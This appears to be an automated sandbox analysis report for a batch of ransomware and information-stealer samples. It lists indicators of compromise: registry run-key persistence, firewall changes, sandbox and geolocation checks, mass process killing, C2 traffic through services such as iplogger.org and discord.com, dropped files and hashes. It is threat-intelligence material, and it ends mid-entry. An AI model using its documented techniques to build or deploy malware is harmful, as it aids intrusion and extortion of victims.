Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 220 4548 rUNdlL32.eXe 91 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral1/memory/9428-16349-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
SectopRAT payload 1 IoCs
resource yara_rule behavioral1/memory/9428-16349-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral1/memory/4956-1036-0x0000000000400000-0x0000000000633000-memory.dmp family_vidar -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 3472 netsh.exe -
ACProtect 1.3x - 1.4x DLL software 1 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral1/files/0x0007000000023cc6-479.dat acprotect -
resource yara_rule behavioral1/files/0x0007000000023f75-25726.dat aspack_v212_v242 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Encoder.gen-147312e093c1a4f70f06fd0597f5f9bfd0c648c6d4b37be26f6bb956a1fc13bc.exe -
Executes dropped EXE 31 IoCs
pid Process 4164 HEUR-Trojan-Ransom.MSIL.Agent.gen-7431f66d89ea92fb18a3fb489b71417672d15e6140e66062912c38138b2a8c55.exe 392 HEUR-Trojan-Ransom.MSIL.Blocker.gen-06207f1f13af1dbbc3de612d1e031437f9f5aefbfdb989d68f52a193405cb160.exe 1132 HEUR-Trojan-Ransom.MSIL.Blocker.gen-1c0edaf81b38ce528d2720863e8316306875941eae58da12f963c20ef9276b30.exe 4792 HEUR-Trojan-Ransom.MSIL.Blocker.gen-36355464c361c0e2caa14c517de97291a9bc6707acda3bbd34a30aa45e55c5b2.exe 5116 HEUR-Trojan-Ransom.MSIL.Blocker.gen-3faaf8a467e00d500ef4345a6676b14d71c687cbb43eec700ec3dbc2fcbaa266.exe 4624 HEUR-Trojan-Ransom.MSIL.Blocker.gen-5a4aab0cd8f0b345d8c07ff690a7b038ed23d6bd5587360e0c17c22d9bf0f70f.exe 1412 HEUR-Trojan-Ransom.MSIL.Blocker.gen-78f124b7a00d29a4573c261f1ef8be979ce46c347371365ba820ba5750422f88.exe 4080 HEUR-Trojan-Ransom.MSIL.Blocker.gen-da4b4dd47271515cd6569e478a8a64369d5b60be78a7ff89bd885fcd98464349.exe 3924 HEUR-Trojan-Ransom.MSIL.Blocker.gen-dbc9ca213f978c5cd8574d52088a9edfa09432fd760adb7736fc6bf04e531c82.exe 1080 HEUR-Trojan-Ransom.MSIL.Foreign.gen-ae25edc0d1d6f7e83eee6a9a28a80c1a6833405459a7ea98bf7ce1c1ada86843.exe 3932 HEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exe 4812 HEUR-Trojan-Ransom.Win32.Conti.gen-bc9e62441e8da444a8b03f9a65ee30c285b918b20bc1cbc9dcfa3cf4555a9de8.exe 4956 HEUR-Trojan-Ransom.Win32.Convagent.gen-05474ec47384f809841c2d0a5ff1eacfcd16098ae716bb73ec6e228646729179.exe 1808 HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-e3ecf4dc1b902b9f50eb00fc448f80b0e05436bd6c1c71840bad45d3ec6221af.exe 5096 HEUR-Trojan-Ransom.Win32.Cryptor.gen-3d8b6ccfcb742aeaac194c6a245ed08131a14919c4950039bf833c764e6d4f66.exe 4644 HEUR-Trojan-Ransom.Win32.Cryptor.gen-5c5d05c4dcc9489ed527a1a607f0e2884d10558451662bcc849e36da7eca570c.exe 4620 HEUR-Trojan-Ransom.Win32.Cryptor.gen-b800bf6f11170ff68cd552484fa144571069513adad2d75ac7462b126b5f0816.exe 3296 HEUR-Trojan-Ransom.Win32.Cryptor.gen-dccdb2a42dc68462807d81b94f1254d92356c8b6d1da660ed047d8a6bfc8debe.exe 5056 HEUR-Trojan-Ransom.Win32.Darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe 1544 heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe 4512 heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe 832 HEUR-Trojan-Ransom.Win32.Encoder.gen-11dd8b2605b8ef05a481ee4b8839596b5eeff327b57c81271e400f57d544d848.exe 1828 heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe 1716 HEUR-Trojan-Ransom.Win32.Encoder.gen-147312e093c1a4f70f06fd0597f5f9bfd0c648c6d4b37be26f6bb956a1fc13bc.exe 3084 HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3bca71282c685bf813ca9a3b51180fa51aecd6d7bf29638006da7b8fd4ba4022.exe 1828 DARK_BLITZ.exe 5264 HEUR-Trojan-Ransom.Win32.Gen.gen-50416e50797cf88a48d086e718c003e2d10c3847b1a251669d6f10f8d3546e03.exe 5308 MsMpEng.exe 5608 HEUR-Trojan-Ransom.Win32.Generic-1198f7a8f6cc4f524fd18e90351d3a01d4f44607df66d42ece6745a72da50163.exe 5672 HEUR-Trojan-Ransom.Win32.Generic-14f9538dd611ca701bdbc6b34a0562e8b18c2492ff323b32557b36673434541a.exe 5684 HEUR-Trojan-Ransom.Win32.Generic-d29b8160e51dd29474f3464111fc888da8adb2bc2f0d4f29ce71219ffc846bd5.exe -
Loads dropped DLL 1 IoCs
pid Process 5308 MsMpEng.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 6776 icacls.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/memory/4792-437-0x0000000006890000-0x00000000068B8000-memory.dmp agile_net -
Uses the VBS compiler for execution 1 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bytelocker = "\"C:\\Users\\Admin\\AppData\\Roaming\\{a1b756dc-8d0f-4176-93b8-94c8b6d677b8}.exe\"" HEUR-Trojan-Ransom.MSIL.Blocker.gen-1c0edaf81b38ce528d2720863e8316306875941eae58da12f963c20ef9276b30.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DLLclnbldwrz189r = "C:\\Users\\Admin\\AppData\\Roaming\\DLLclnbldwrz189r.exe" HEUR-Trojan-Ransom.MSIL.Blocker.gen-78f124b7a00d29a4573c261f1ef8be979ce46c347371365ba820ba5750422f88.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: HEUR-Trojan-Ransom.Win32.Encoder.gen-11dd8b2605b8ef05a481ee4b8839596b5eeff327b57c81271e400f57d544d848.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs
flow ioc 1358 iplogger.org 2423 iplogger.org 2425 iplogger.org 55 raw.githubusercontent.com 56 raw.githubusercontent.com 2422 iplogger.org 1357 iplogger.org 2427 iplogger.org 2989 raw.githubusercontent.com 3006 discord.com 3007 discord.com 1361 iplogger.org 2428 iplogger.org 2429 iplogger.org 2709 raw.githubusercontent.com -
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 724 icanhazip.com 1364 api.2ip.ua 2414 ipinfo.io 2415 ipinfo.io 981 api.ipify.org 982 api.ipify.org 1365 api.2ip.ua 2424 api.db-ip.com 2426 api.db-ip.com 2700 api.2ip.ua -
Enumerates processes with tasklist 1 TTPs 45 IoCs
pid Process 2084 tasklist.exe 7588 tasklist.exe 8088 tasklist.exe 6944 tasklist.exe 7072 tasklist.exe 9132 tasklist.exe 7720 tasklist.exe 9752 tasklist.exe 3480 tasklist.exe 9948 tasklist.exe 8580 tasklist.exe 3280 tasklist.exe 1792 tasklist.exe 4116 tasklist.exe 8472 tasklist.exe 7284 tasklist.exe 8944 tasklist.exe 6808 tasklist.exe 3544 tasklist.exe 9652 tasklist.exe 3768 tasklist.exe 5460 tasklist.exe 7196 tasklist.exe 4228 tasklist.exe 6660 tasklist.exe 5856 tasklist.exe 2528 tasklist.exe 2760 tasklist.exe 7620 tasklist.exe 6540 tasklist.exe 1180 tasklist.exe 6652 tasklist.exe 8028 tasklist.exe 7452 tasklist.exe 7008 tasklist.exe 1852 tasklist.exe 4028 tasklist.exe 3000 tasklist.exe 8656 tasklist.exe 8184 tasklist.exe 2380 tasklist.exe 7520 tasklist.exe 6736 tasklist.exe 2328 tasklist.exe 4988 tasklist.exe -
resource yara_rule behavioral1/files/0x000a000000023b81-273.dat upx behavioral1/memory/1808-279-0x0000000000400000-0x00000000005BB000-memory.dmp upx behavioral1/files/0x0008000000023c82-319.dat upx behavioral1/files/0x0007000000023cc6-479.dat upx behavioral1/memory/1808-1040-0x0000000000400000-0x00000000005BB000-memory.dmp upx behavioral1/memory/6132-26581-0x0000000000400000-0x0000000000475000-memory.dmp upx behavioral1/memory/6132-30326-0x0000000000400000-0x0000000000475000-memory.dmp upx -
Drops file in Program Files directory 16 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\7-zip.chm HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-e3ecf4dc1b902b9f50eb00fc448f80b0e05436bd6c1c71840bad45d3ec6221af.exe File opened for modification C:\Program Files\7-Zip\7-zip32.dll HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-e3ecf4dc1b902b9f50eb00fc448f80b0e05436bd6c1c71840bad45d3ec6221af.exe File opened for modification C:\Program Files\7-Zip\7zCon.sfx HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-e3ecf4dc1b902b9f50eb00fc448f80b0e05436bd6c1c71840bad45d3ec6221af.exe File created C:\Program Files\7-Zip\7-zip32.dll.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-e3ecf4dc1b902b9f50eb00fc448f80b0e05436bd6c1c71840bad45d3ec6221af.exe File opened for modification C:\Program Files\7-Zip\7z.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-e3ecf4dc1b902b9f50eb00fc448f80b0e05436bd6c1c71840bad45d3ec6221af.exe File created C:\Program Files\7-Zip\7zCon.sfx.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-e3ecf4dc1b902b9f50eb00fc448f80b0e05436bd6c1c71840bad45d3ec6221af.exe File created C:\Program Files\7-Zip\7zFM.exe.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-e3ecf4dc1b902b9f50eb00fc448f80b0e05436bd6c1c71840bad45d3ec6221af.exe File created C:\Program Files\7-Zip\7-zip.chm.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-e3ecf4dc1b902b9f50eb00fc448f80b0e05436bd6c1c71840bad45d3ec6221af.exe File created C:\Program Files\7-Zip\7-zip.dll.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-e3ecf4dc1b902b9f50eb00fc448f80b0e05436bd6c1c71840bad45d3ec6221af.exe File opened for modification C:\Program Files\7-Zip\7z.dll HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-e3ecf4dc1b902b9f50eb00fc448f80b0e05436bd6c1c71840bad45d3ec6221af.exe File created C:\Program Files\7-Zip\7z.exe.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-e3ecf4dc1b902b9f50eb00fc448f80b0e05436bd6c1c71840bad45d3ec6221af.exe File created C:\Program Files\7-Zip\7z.sfx.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-e3ecf4dc1b902b9f50eb00fc448f80b0e05436bd6c1c71840bad45d3ec6221af.exe File created C:\Program Files\7-Zip\7-zip.dll HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-e3ecf4dc1b902b9f50eb00fc448f80b0e05436bd6c1c71840bad45d3ec6221af.exe File created C:\Program Files\7-Zip\7z.dll.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-e3ecf4dc1b902b9f50eb00fc448f80b0e05436bd6c1c71840bad45d3ec6221af.exe File opened for modification C:\Program Files\7-Zip\7z.sfx HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-e3ecf4dc1b902b9f50eb00fc448f80b0e05436bd6c1c71840bad45d3ec6221af.exe File opened for modification C:\Program Files\7-Zip\7zFM.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-e3ecf4dc1b902b9f50eb00fc448f80b0e05436bd6c1c71840bad45d3ec6221af.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\mpsvc.dll HEUR-Trojan-Ransom.Win32.Gen.gen-50416e50797cf88a48d086e718c003e2d10c3847b1a251669d6f10f8d3546e03.exe File created C:\Windows\MsMpEng.exe HEUR-Trojan-Ransom.Win32.Gen.gen-50416e50797cf88a48d086e718c003e2d10c3847b1a251669d6f10f8d3546e03.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5424 sc.exe 1184 sc.exe 5580 sc.exe 2044 sc.exe 5204 sc.exe 4856 sc.exe 5428 sc.exe 2864 sc.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 2 IoCs
pid Process 5512 AdvancedRun.exe 6772 AdvancedRun.exe -
pid Process 8188 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 9 IoCs
pid pid_target Process procid_target 804 4624 WerFault.exe 103 3596 4956 WerFault.exe 113 8948 4544 WerFault.exe 285 10228 8708 WerFault.exe 365 6252 7296 WerFault.exe 378 5972 6132 WerFault.exe 381 3932 9896 WerFault.exe 403 4304 6944 WerFault.exe 404 10184 2676 WerFault.exe 471 -
System Location Discovery: System Language Discovery 1 TTPs 27 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-dbc9ca213f978c5cd8574d52088a9edfa09432fd760adb7736fc6bf04e531c82.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Encoder.gen-11dd8b2605b8ef05a481ee4b8839596b5eeff327b57c81271e400f57d544d848.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3bca71282c685bf813ca9a3b51180fa51aecd6d7bf29638006da7b8fd4ba4022.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-3faaf8a467e00d500ef4345a6676b14d71c687cbb43eec700ec3dbc2fcbaa266.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Conti.gen-bc9e62441e8da444a8b03f9a65ee30c285b918b20bc1cbc9dcfa3cf4555a9de8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Cryptor.gen-5c5d05c4dcc9489ed527a1a607f0e2884d10558451662bcc849e36da7eca570c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Cryptor.gen-dccdb2a42dc68462807d81b94f1254d92356c8b6d1da660ed047d8a6bfc8debe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Convagent.gen-05474ec47384f809841c2d0a5ff1eacfcd16098ae716bb73ec6e228646729179.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-06207f1f13af1dbbc3de612d1e031437f9f5aefbfdb989d68f52a193405cb160.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Generic-d29b8160e51dd29474f3464111fc888da8adb2bc2f0d4f29ce71219ffc846bd5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Generic-1198f7a8f6cc4f524fd18e90351d3a01d4f44607df66d42ece6745a72da50163.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-36355464c361c0e2caa14c517de97291a9bc6707acda3bbd34a30aa45e55c5b2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Encoder.gen-147312e093c1a4f70f06fd0597f5f9bfd0c648c6d4b37be26f6bb956a1fc13bc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Gen.gen-50416e50797cf88a48d086e718c003e2d10c3847b1a251669d6f10f8d3546e03.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-5a4aab0cd8f0b345d8c07ff690a7b038ed23d6bd5587360e0c17c22d9bf0f70f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Cryptor.gen-3d8b6ccfcb742aeaac194c6a245ed08131a14919c4950039bf833c764e6d4f66.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Cryptor.gen-b800bf6f11170ff68cd552484fa144571069513adad2d75ac7462b126b5f0816.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsMpEng.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-1c0edaf81b38ce528d2720863e8316306875941eae58da12f963c20ef9276b30.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Agent.gen-7431f66d89ea92fb18a3fb489b71417672d15e6140e66062912c38138b2a8c55.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-78f124b7a00d29a4573c261f1ef8be979ce46c347371365ba820ba5750422f88.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 HEUR-Trojan-Ransom.Win32.Encoder.gen-11dd8b2605b8ef05a481ee4b8839596b5eeff327b57c81271e400f57d544d848.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz HEUR-Trojan-Ransom.Win32.Encoder.gen-11dd8b2605b8ef05a481ee4b8839596b5eeff327b57c81271e400f57d544d848.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString HEUR-Trojan-Ransom.Win32.Encoder.gen-11dd8b2605b8ef05a481ee4b8839596b5eeff327b57c81271e400f57d544d848.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 HEUR-Trojan-Ransom.Win32.Encoder.gen-11dd8b2605b8ef05a481ee4b8839596b5eeff327b57c81271e400f57d544d848.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 HEUR-Trojan-Ransom.Win32.Encoder.gen-11dd8b2605b8ef05a481ee4b8839596b5eeff327b57c81271e400f57d544d848.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz HEUR-Trojan-Ransom.Win32.Encoder.gen-11dd8b2605b8ef05a481ee4b8839596b5eeff327b57c81271e400f57d544d848.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString HEUR-Trojan-Ransom.Win32.Encoder.gen-11dd8b2605b8ef05a481ee4b8839596b5eeff327b57c81271e400f57d544d848.exe -
Delays execution with timeout.exe 46 IoCs
pid Process 520 timeout.exe 2448 timeout.exe 4532 timeout.exe 8364 timeout.exe 6376 timeout.exe 7960 timeout.exe 2964 timeout.exe 10140 timeout.exe 8360 timeout.exe 7700 timeout.exe 9788 timeout.exe 1728 timeout.exe 8124 timeout.exe 9452 timeout.exe 6356 timeout.exe 9232 timeout.exe 5764 timeout.exe 3880 timeout.exe 3708 timeout.exe 5444 timeout.exe 2764 timeout.exe 1584 timeout.exe 5540 timeout.exe 5352 timeout.exe 8956 timeout.exe 4536 timeout.exe 7964 timeout.exe 6536 timeout.exe 6720 timeout.exe 3524 timeout.exe 2344 timeout.exe 684 timeout.exe 4684 timeout.exe 3932 timeout.exe 7068 timeout.exe 3460 timeout.exe 5488 timeout.exe 8592 timeout.exe 5868 timeout.exe 7152 timeout.exe 2916 timeout.exe 5620 timeout.exe 1356 timeout.exe 1128 timeout.exe 3992 timeout.exe 6168 timeout.exe -
Kills process with taskkill 44 IoCs
pid Process 7100 taskkill.exe 6396 taskkill.exe 7552 taskkill.exe 10016 taskkill.exe 6288 taskkill.exe 8212 taskkill.exe 6328 taskkill.exe 6956 taskkill.exe 8416 taskkill.exe 5008 taskkill.exe 8784 taskkill.exe 5520 taskkill.exe 6980 taskkill.exe 9332 taskkill.exe 8120 taskkill.exe 5200 taskkill.exe 6752 taskkill.exe 6672 taskkill.exe 4308 taskkill.exe 9664 taskkill.exe 9360 taskkill.exe 7112 taskkill.exe 8572 taskkill.exe 2044 taskkill.exe 6344 taskkill.exe 7052 taskkill.exe 9936 taskkill.exe 6944 taskkill.exe 5480 taskkill.exe 5832 taskkill.exe 8860 taskkill.exe 8652 taskkill.exe 9268 taskkill.exe 7732 taskkill.exe 4448 taskkill.exe 9576 taskkill.exe 8024 taskkill.exe 7944 taskkill.exe 6632 taskkill.exe 8472 taskkill.exe 4928 taskkill.exe 5328 taskkill.exe 5468 taskkill.exe 8884 taskkill.exe -
Modifies data under HKEY_USERS 24 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\SessionHash = 86ea22f37bd87eb1106421d8de455200939bdec84094b41e20baea18a41ce3e9 heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\Sequence = "1" heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000 heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\SessionHash = dbabc5224ae49c74694af46890864205ee12d9a03e1ab3fdab233609095ab698 heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\SessionHash = 9248bdf3ea8ac4f38a9b40b5633ba3aa33e32ce84455ecc7848477340d572811 heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\RegFiles0000 = 5c005c003f005c0043003a005c00550073006500720073005c00410064006d0069006e005c004400650073006b0074006f0070005c00300030003400350030005c0048004500550052002d00540072006f006a0061006e002d00520061006e0073006f006d002e00570069006e00330032002e004400610072006b0073006900640065002e00670065006e002d0062003500360035006500390032003600360037003100370031003600310031003600330065003800380034003700390033006400630031003000300034006600390066003200630061003900340061006200300035003300330064006600390063003100360037006400350064003100380038006300650062006600320066002e0065007800650000000000 heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\RegFilesHash = 466a85b10bd63e80953b250273d98f22a3a09dcbdc3294c287e6c53c0fe6601a heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\RegFilesHash = a163589346b88c034b4290cfc243e468d3ef0c14d58dd39ec277c6beaee45518 heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\RegFilesHash = be7ec513771efdee4161435dad8f683e8f12b5ab519d2edcdeec7d5a2fa19c40 heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\RegFilesHash = 5800a5918a4c3be1e4b15cc4f3fe752d4b8b4e9048de6c1b28f13b4bd6b1d30b heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\SessionHash = d97637f5bd73eb1130f0f3e889d64f97622925418a35b662a7efb852574172d1 heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\RegFilesHash = effb8f5c66646ee1a65248b9a46804eb351c8a52ac8255e2cca4052b91b7ad03 heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\RegFilesHash = 